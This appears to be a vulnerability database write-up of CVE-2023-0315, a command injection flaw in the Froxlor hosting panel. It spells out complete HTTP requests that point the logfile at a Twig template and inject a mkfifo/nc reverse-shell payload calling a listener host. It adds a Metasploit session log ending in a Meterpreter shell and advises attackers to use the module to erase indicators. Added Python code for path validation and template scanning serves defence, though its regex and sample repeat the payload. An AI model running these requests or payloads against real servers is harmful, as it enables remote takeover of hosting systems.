Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network

CVE-2023-0315

Disclosure Date: January 16, 2023
Tactics
Execution
Validation
Validated

Description

Command Injection in GitHub repository froxlor/froxlor prior to 2.0.8.


Technical Analysis

Attacker Value and Exploitability

Froxlor is an open source web hosting control panel, with around 20,000 live instances listening on the internet at the time of writing. In versions <= 2.0.6 there exists an authenticated RCE vulnerability. Exploitation is trivial given credentials to the Froxlor application, as PoC details and a Metasploit module are readily available, giving this vulnerability a moderate Attacker Value & Exploitability rating.

Vulnerability Details

Exploiting this vuln requires a few simple steps:

  • As an authenticated user, change the logfile path to /var/www/html/froxlor/templates/Froxlor/footer.html.twig. This can be done by sending the following POST request to the server:
POST /froxlor/admin_settings.php?page=overview&part=logging HTTP/1.1
Host: 172.16.199.140
Content-Length: 1125
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.199.140
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt8L3nWBWoG1AKOVm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.199.140/froxlor/admin_settings.php?page=overview&part=logging
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=admjpmobmubbadpq6lpun95b8q
Connection: close

------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_enabled"

0
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_enabled"

1
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_severity"

2
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_logtypes[]"

file
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_logfile"

/var/www/html/froxlor/logs/froxlor.log
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="logger_log_cron"

0
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="csrf_token"

cce9438c7954b65c86960649e5b95e8fc1157c61
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="page"

overview
------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="action"


------WebKitFormBoundaryt8L3nWBWoG1AKOVm
Content-Disposition: form-data; name="send"

send
------WebKitFormBoundaryt8L3nWBWoG1AKOVm--

(Twig is a template engine for the PHP programming language. The file mentioned above, footer.html.twig, is the footer for the homepage of the Froxlor application and, lucky for the attacker, it gets executed every time the homepage is refreshed.)

  • Next, inject a payload into the new logfile with the following format: {{['COMMAND']|filter('exec')}}. This ensures the command will be executed when the .twig file is loaded. This can be achieved by changing the ‘theme’ of the Froxlor application as an authenticated user with the following POST request:
POST /froxlor/admin_index.php HTTP/1.1
Host: 172.16.199.140
Content-Length: 101
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.199.140
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.199.140/froxlor/admin_index.php?page=change_theme
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8nvcp4180gkp3n68ekgtgubvpt
Connection: close

theme=%7b%7b%5b%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%37%32%2e%31%36%2e%31%39%39%2e%31%20%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66%27%5d%7c%66%69%6c%74%65%72%28%27%65%78%65%63%27%29%7d%7d&csrf_token=caeb932a7ea81b18d82116300b79be5d8a008a10&page=change_theme&send=send&dosave=

In the above request, theme has been URL encoded and set to: {{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.199.1 4444 >/tmp/f']|filter('exec')}}

  • Now, with a listener set up, all the attacker has to do is send the following GET request to trigger the payload (or reload the Froxlor application in their browser) and they will have a shell running in the context of the application (which, if running on Ubuntu in a default configuration, would be user www-data):
GET /froxlor/admin_index.php? HTTP/1.1
Host: 172.16.199.140
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.199.140/froxlor/admin_index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8nvcp4180gkp3n68ekgtgubvpt
Connection: close

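The chain above works because the logger's file path setting accepts any path the web server user can write to, so an admin-level account can redirect log output into a template that Twig later renders. The following Python model is an added example, not Froxlor's own code or its actual 2.0.8 fix: it places the weak "accept anything" behaviour beside a hardened validator that only accepts an absolute path that resolves inside the install's log directory and carries a log-file suffix. LOGS_DIR, the function names and the default suffix list are assumptions for illustration.

```python
import os

# Assumed log directory of the install shown on this page (assumption, not
# taken from Froxlor's source).
LOGS_DIR = "/var/www/html/froxlor/logs"


def weak_validate_logfile_path(candidate):
    """Model of the vulnerable behaviour: any non-empty string is accepted,
    including a path to a writable .twig template."""
    return bool(candidate), candidate


def validate_logfile_path(candidate, allowed_dir=LOGS_DIR, allowed_suffixes=(".log",)):
    """Return (accepted, detail) for an admin-supplied log file path.

    Hardened rules: absolute path only, no NUL bytes, resolved location must
    stay inside allowed_dir (so '..' segments and existing symlinks cannot
    escape it), and the file name must end with an allowed suffix so the
    logger can never be pointed at a template or PHP file.
    """
    if not isinstance(candidate, str) or not candidate:
        return False, "empty path"
    if "\x00" in candidate:
        return False, "NUL byte in path"
    if not os.path.isabs(candidate):
        return False, "path must be absolute"
    # realpath collapses '..' and follows any symlink that already exists on
    # disk; comparing with commonpath avoids the classic string-prefix bug
    # where /var/www/html/froxlor/logs2/x.log would pass a startswith check.
    resolved = os.path.realpath(candidate)
    base = os.path.realpath(allowed_dir)
    if os.path.commonpath([base, resolved]) != base:
        return False, "path escapes %s" % allowed_dir
    if resolved == base:
        return False, "path is the log directory itself"
    if not resolved.endswith(allowed_suffixes):
        return False, "file name must end with one of %s" % (allowed_suffixes,)
    return True, resolved


if __name__ == "__main__":
    # The default value, the path used in the write-up, and a traversal variant.
    for path in (
        "/var/www/html/froxlor/logs/froxlor.log",
        "/var/www/html/froxlor/templates/Froxlor/footer.html.twig",
        "/var/www/html/froxlor/logs/../templates/Froxlor/footer.html.twig",
    ):
        print("weak:", weak_validate_logfile_path(path)[0], "hardened:", validate_logfile_path(path))
```

The suffix check matters as much as the containment check: a template directory writable by www-data is only half of the bug, the other half is that a log line (which carries user-controlled data such as the theme name) is written byte-for-byte into a file the template engine will interpret.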
IOCs

As soon as the logfile path is changed to footer.html.twig or any other .twig file the attacker chooses to target, the Froxlor application begins writing log lines to that file. In the case of footer.html.twig, users will start to see log lines appearing at the bottom (in the footer element) of the application like so:

[Screenshot: Screen Shot 2023-02-14 at 3 26 17 PM, showing log lines rendered in the Froxlor footer]

Once the attacker has injected their payload, the application will hang, as the payload is executed and the application runs off to connect to the attacker. Now, these IOCs can be covered up if the attacker changes the log file path back to its original setting and then erases the payload and additional log lines from footer.html.twig. The Metasploit module covers up these IOCs, so if you plan on exploiting this vuln, be sure to make use of it.
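
Because a careful attacker restores the log path and rewrites the footer, the durable template-side indicators are (a) a Twig callable filter naming a command-execution function inside any .twig file and (b) a template whose hash no longer matches the shipped file. The scanner below is an added example, not Froxlor's tooling or the page author's code, and it generalises beyond filter('exec') to the other Twig filters that take a PHP callable by name (map, reduce, sort) and to the other exec-style PHP functions. The sample footer contents are constructed for the demo; the real Froxlor log line format is not modelled.

```python
import hashlib
import os
import re

# Twig filters that invoke an arbitrary PHP callable by name; combined with a
# command-execution function they run commands when the template renders.
TWIG_EXEC_RE = re.compile(
    r"\|\s*(?:filter|map|reduce|sort)\s*\(\s*['\"]"
    r"(?:exec|system|passthru|shell_exec|popen|proc_open)['\"]\s*\)",
    re.IGNORECASE,
)

# Constructed samples (not real Froxlor files): a clean footer and one that
# carries the payload shape used in the write-up above.
SAMPLE_CLEAN_FOOTER = "</div>\n</body>\n</html>\n"
SAMPLE_TAMPERED_FOOTER = (
    "</div>\n"
    "</body>\n"
    "</html>\n"
    "{{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.199.1 4444 >/tmp/f']"
    "|filter('exec')}}\n"
)


def find_exec_constructs(text):
    """Return (line_number, snippet) for every line holding a callable-filter
    construct that names a command-execution PHP function."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if TWIG_EXEC_RE.search(line):
            hits.append((lineno, line.strip()[:120]))
    return hits


def fingerprint(data):
    """SHA-256 hex digest of raw file bytes."""
    return hashlib.sha256(data).hexdigest()


def snapshot(root):
    """Map every .twig file under root (path relative to root) to its hash.
    Run this once on a known-clean install to build the baseline."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".twig"):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    result[os.path.relpath(full, root)] = fingerprint(fh.read())
    return result


def changed_files(baseline, current):
    """Compare two snapshots; returns sorted (modified, added, removed) lists."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def scan_templates(root, baseline=None):
    """Content scan of all .twig files under root, plus an integrity diff
    against a baseline snapshot when one is supplied."""
    findings = {"exec_constructs": {}, "integrity": None}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".twig"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_exec_constructs(fh.read())
            if hits:
                findings["exec_constructs"][os.path.relpath(full, root)] = hits
    if baseline is not None:
        findings["integrity"] = changed_files(baseline, snapshot(root))
    return findings


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "Froxlor")
        os.makedirs(tpl)
        footer = os.path.join(tpl, "footer.html.twig")
        with open(footer, "w") as fh:
            fh.write(SAMPLE_CLEAN_FOOTER)
        baseline = snapshot(root)          # taken while the install is clean
        with open(footer, "w") as fh:
            fh.write(SAMPLE_TAMPERED_FOOTER)  # simulate the attacker's write
        print(scan_templates(root, baseline))
```

The integrity diff is the check that survives cleanup: the module's "Rewriting clean footer.html.twig file" step restores content, but only if the rewritten bytes match the shipped file does the hash comparison go quiet, so a baseline taken from the package or a clean checkout is the reference to keep.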

Metasploit Module Demonstration:

msf6 > use exploit/linux/http/froxlor_log_path_rce
[*] Using exploit/linux/http/froxlor_log_path_rce
msf6 exploit(linux/http/froxlor_log_path_rce) > set rhosts 172.16.199.140
rhosts => 172.16.199.140
msf6 exploit(linux/http/froxlor_log_path_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/http/froxlor_log_path_rce) > set lport 9191
lport => 9191
msf6 exploit(linux/http/froxlor_log_path_rce) > set username admin
username => admin
msf6 exploit(linux/http/froxlor_log_path_rce) > set password notpassword
password => notpassword
msf6 exploit(linux/http/froxlor_log_path_rce) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:9191
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Successful login
[+] The target appears to be vulnerable. Vulnerable version found: 2.0.3
[+] Successfully Logged in!
[+] CSRF token is : 5701b7e6335ab13e20e91845b210b6be0bea7621
[+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig
[*] Using URL: http://172.16.199.1:8080/ygs3pAWMRNIs
[+] Injected payload sucessfully
[*] Changing logfile path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log
[*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ygs3pAWMRNIs
[*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045348 bytes) to 172.16.199.140
[*] Cleaning up...
[*] Deleting tampered footer.html.twig file
[*] Rewriting clean footer.html.twig file
[*] Meterpreter session 3 opened (172.16.199.1:9191 -> 172.16.199.140:50398) at 2023-02-13 18:20:02 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.140
OS           : Ubuntu 20.04 (Linux 5.15.0-58-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • froxlor

Products

  • froxlor

